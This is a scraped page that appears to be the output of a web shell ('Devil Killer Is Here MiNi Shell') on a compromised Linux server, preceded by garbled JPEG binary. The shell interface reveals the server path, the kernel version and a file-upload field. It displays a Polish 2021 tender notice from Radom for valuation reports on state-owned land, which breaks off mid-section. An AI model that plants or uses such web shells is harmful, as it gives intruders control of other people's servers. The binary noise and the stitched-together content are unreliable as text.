JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019830601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa sporządzenia operatów szacunkowych, dot. nieruchomości stanowiących własność Skarbu Państwa, położonych w Radomiu przy ul. Radiowej, Wierzbickiej, Staroopatowskiej oraz ul. Przytyckiej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa reprezentowany przez Prezydenta Miasta Radomia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Kilińskiego 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">483620876</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">483620289</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@umradom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.radom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa sporządzenia operatów szacunkowych, dot. nieruchomości stanowiących własność Skarbu Państwa, położonych w Radomiu przy ul. Radiowej, Wierzbickiej, Staroopatowskiej oraz ul. Przytyckiej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55c52a25-096e-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00198306</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00067533/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Operaty (naliczenia i aktualiz.opłat rocznych z tyt.użytk.wieczyst.oddania nieruchomości i lokali w trwały zarząd,zbycia,nabycia,darowizny,oddania w najem,dzierżawę nieruchomości,odszkodowań (WNS)</p> <p class="mb-0">1.3.7 Operaty (naliczenia i aktualiz.opłat rocznych z tyt.użytk.wieczyst.oddania nieruchomości i lokali w trwały zarząd,zbycia,nabycia,darowizny,oddania w najem,dzierżawę nieruchomości,odszkodowań (WNS)</p> <p class="mb-0">1.3.8 Operaty (naliczenia i aktualiz.opłat rocznych z tyt.użytk.wieczyst.oddania nieruchomości i lokali w trwały zarząd,zbycia,nabycia,darowizny,oddania w najem,dzierżawę nieruchomości,odszkodowań (WNS)</p> <p class="mb-0">1.3.9 Operaty (naliczenia i aktualiz.opłat rocznych z tyt.użytk.wieczyst.oddania nieruchomości i lokali w trwały zarząd,zbycia,nabycia,darowizny,oddania w najem,dzierżawę nieruchomości,odszkodowań (WNS)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/501254 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/501254</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postęp.<br/>prowadzone jest w j. polskim za pośrednictwem platformy zakupowej Open<br/>Nexus pod adresem:https://platformazakupowa.pl/transakcja/501254. 2. W celu skrócenia czasu<br/>udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamaw. a Wykonawcą, w tym<br/>wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku<br/>„Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość została<br/>wysłana do Zamawiającego. 3. Zamawiający dopuszcza również komunikację w powyższym zakresie<br/>przy pomocy poczty elektronicznej wymienionej w pkt. 3 Rozdział I SWZ, tj. bzp@umradom.pl. 4. Za<br/>pomocą poczty elektronicznej, na wskazany w pkt. 3 adres email Wykonaw. może złożyć w<br/>szczególności: a) np. wnioski dotyczące wyjaśnienia treści SWZ (dokumentacja przesyłana przed<br/>otwarciem ofert), b) np. podmiotowe środki dowodowe i inne ewentualne oświadczenia składane na<br/>wezwanie Zamawiającego (dokumentacja przesyłana po otwarciu ofert). 5.Zamawiający będzie<br/>przekazywał Wykonaw. informacje za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia<br/>ofert Zamaw. będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie<br/>z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego Wykonaw. 6. Zamaw. Zgodnie<br/>z Rozporządzeniem Prezesa RM z dnia 30.12.2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.<br/>2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s, b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows<br/>7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c) zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku Internet Explorer minimalnie wersja 10 0., d) włączona obsługa JavaScript, e) zainstalowany<br/>program Adobe Acrobat Reader lub inny obsługujący format plików.pdf, f) szyfrowanie na<br/>platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3., g) oznaczenie czasu odbioru danych<br/>przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. Czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.7. Formaty plików<br/>wykorzystywanych przez Wykonaw. powinny być zgodne z Obwieszczeniem Prezesa RM z<br/>09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia RM w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. a) Zamawiający<br/>rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) b) W celu ewentualnej kompresji<br/>danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7 Z 8. Ofertę składa się<br/>pod rygorem nieważności w formie elektron. opatrzonej kwalifik. podp. elektron. lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W procesie składania oferty za<br/>pośrednictwem platformazakupowa.pl, Wykonaw. powinien złożyć podpis bezpośrednio na<br/>dokumentach przesłanych za pośrednictwem platformazakupowa.pl. Szczegół. info. w przedmiotowym<br/>zakresie zawarte są w Rozdziale XVI, XIX i XX SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/transakcja/501254</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: a)<br/>administratorem Pani/Pana danych osobowych jest Prezydent Miasta Radomia z siedzibą w Radomiu<br/>ul. Kilińskiego 30; b) kontakt z Inspektorem Ochrony Danych Panem Mateuszem Szczypior –<br/>iod.kontakt@umradom.pl; c) Pani/Pana dane osobowe przetwarzane będą w celu realizacji<br/>ustawowych zadań urzędu - na podstawie art. 6 ust. 1 lit. b, c ogólnego rozporządzenia o ochronie<br/>danych osobowych z dnia 27 kwietnia 2016r. oraz na podstawie Art. 9 ust 2 lit a ogólnego<br/>rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r.; d) odbiorcami Pani/Pana<br/>danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na<br/>podstawie przepisów prawa w tym m.in. osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019<br/>roku – Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129 ze zm.), dalej „ustawa Pzp”; e) Pani/Pana<br/>dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją<br/>kancelaryjną; f) posiada Pani/Pan:- na podstawie art. 15 RODO prawo do żądania od administratora<br/>dostępu do danych osobowych - na podstawie art. 16 RODO prawo do ich sprostowania*- na<br/>podstawie art. 18 RODO prawo do ograniczenia przetwarzania prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO **; g) ma Pani/Pan prawo wniesienia skargi do organu nadzorczego (tj. Prezesa Urzędu<br/>Ochrony Danych Osobowych); h) nie przysługuje Pani/Panu:- w związku z art. 17 ust.3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o których<br/>mowa w art. 20 RODO, - na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.*: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. **: prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>Zamawiający dodatkowo informuje, że: Wykonawca ubiegający się o udzielenie zamówienia<br/>publicznego jest zobowiązany do wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub<br/>art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał<br/>w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.1.355.378.385.386.2021.MB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa sporządzenia opinii o wartości nieruchomości w formie 10 operatów szacunkowych (po 2 egz.), dotyczących określenia wartości rynkowej prawa własności nieruchomości gruntowych, stanowiących własność Skarbu Państwa położonych w Radomiu, przy ulicy Radiowej oznaczonych w ewidencji gruntów i budynków m. Radomia: <br/>1. nr 231/61 o pow. 750 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00158256/5 we współużytkowaniu wieczystym osób fizycznych,<br/>2. nr 231/62 o pow. 748 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00157915/6 w użytkowaniu wieczystym osób fizycznych,<br/>3. nr 231/64 o pow. 744 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00158413/4 w użytkowaniu wieczystym osób fizycznych,<br/>4. nr 231/66, 231/67 i 231/68 o łącznej pow. 2216 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej Nr RA1R/00157914/9 w użytkowaniu wieczystym osób fizycznych,<br/>5. nr 231/69 o pow. 735 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00163763/0 w użytkowaniu wieczystym osób fizycznych,<br/>6. nr 231/75 i 231/86 o łącznej pow. 1347m2, zapisanej w księdze wieczystej Nr RA1R/00162800/5 w użytkowaniu wieczystym osób fizycznych,<br/>7. nr 231/70 o pow. 733 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00157912/5 w użytkowaniu wieczystym osób fizycznych,<br/>8. nr 231/72 o pow. 730 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00157913/2 w użytkowaniu wieczystym osób fizycznych,<br/>9. nr 231/73 o pow. 728 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00162103/9 w użytkowaniu wieczystym osób fizycznych,<br/>10. nr 231/74 o pow. 726 m2, (Obr. 0010, ark. 20), zapisanej w księdze wieczystej <br/>Nr RA1R/00162053/3 w użytkowaniu wieczystym osób fizycznych<br/>będących w użytkowaniu/współużytkowaniu wieczystym osób fizycznych.<br/>W przypadku gdy nastąpiła budowa w/w urządzeń infrastruktury technicznej lub innych nakładów koniecznych, wówczas rzeczoznawca majątkowy winien wymagać od użytkownika wieczystego przedłożenia stosownej dokumentacji potwierdzającej powyższe w celu analizy powyższego i konsultacji z Wydziałem Nieruchomości Skarbu Państwa Urzędu Miejskiego w Radomiu. Jeśli takich nakładów nie dokonano, rzeczoznawca majątkowy winien w operacie szacunkowym powyższe opisać.<br/>Celem wykonania w/w usługi jest określenie wartości rynkowej prawa własności nieruchomości gruntowych w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego z uwzględnieniem nakładów poniesionych na urządzenia infrastruktury technicznej oraz nakładów koniecznych, o których mowa w art. 143 ust. 2, wybudowanych z udziałem środków, o których mowa w art. 143 ust. 1 w ustawie z dnia 21.08.1997r. o gospodarce nieruchomościami (j.t. Dz. U. z 2020r., poz.1990 z późn. zm.) <br/>Budynki posadowione na w/w gruncie nie są przedmiotem wyceny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska<br/>najwyższą ocenę punktową. Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do<br/>dwóch miejsc po przecinku) w oparciu o następujące wzory: Ocena w zakresie kryterium „Cena” będzie<br/>dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba<br/>punktów możliwych do uzyskania – 60). C = (Cn / Cb) x 60 pkt, gdzie: C - ilość punktów za kryterium<br/>„Cena” Cn - najniższa cena ofertowa spośród ofert nieodrzuconych Cb - cena oferty badanej. Ocena w<br/>zakresie kryterium „Termin wykonania zamówienia” będzie dokonywana na podstawie podanego w<br/>formularzu ofertowym terminu wykonania zamówienia (liczba punktów możliwych do uzyskania – 40).<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:- oferta, w której wskazany przez<br/>Wykonawcę termin wykonania zamówienia wyniesie: 7 dni i mniej otrzyma 40 pkt., 8 dni otrzyma 37<br/>pkt. , 9 dni otrzyma 34 pkt., 10 dni otrzyma 31 pkt., 11 dni otrzyma 28 pkt., 12 dni otrzyma 25 pkt., 13<br/>dni otrzyma 22 pkt., 14 dni otrzyma 19 pkt., 15 dni otrzyma 16 pkt., 16 dni otrzyma 13 pkt., 17 dni otrzyma 10 pkt., 18 dni otrzyma 7 pkt., 19 dni otrzyma<br/>4 pkt., 20 dni otrzyma 1 pkt., 21 dni otrzyma 0 pkt. , gdzie: T – ilość punktów za kryterium „Termin wykonania zamówienia”. Zamawiający wybierze<br/>ofertę, która otrzyma najwyższa liczbę punktów (P), stanowiących sumę punktów przyznanych w<br/>ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem: P - liczba punktów<br/>uzyskana przez ofertę: P = C + T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa sporządzenia opinii o wartości nieruchomości w formie 1 operatu szacunkowego ( 2 egz.), dotyczącej określenia wartości rynkowej prawa własności nieruchomości gruntowej, stanowiącej własność Skarbu Państwa, uregulowanej w księdze wieczystej Nr RA1R/00175402/9, oznaczonej w ewidencji gruntów i budynków m. Radomia nr 90/15 o pow. 32623 m2 ( Obr. 0080- Żakowice, ark. 114), położonej w Radomiu przy ulicy Wierzbickiej.<br/>Celem wykonania usługi jest określenie wartości rynkowej prawa własności w/w działki w związku <br/>z naliczeniem wysokości opłaty rocznej z tytułu użytkowania wieczystego gruntu.<br/>Budynki posadowione na w/w gruncie nie są przedmiotem wyceny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska<br/>najwyższą ocenę punktową. 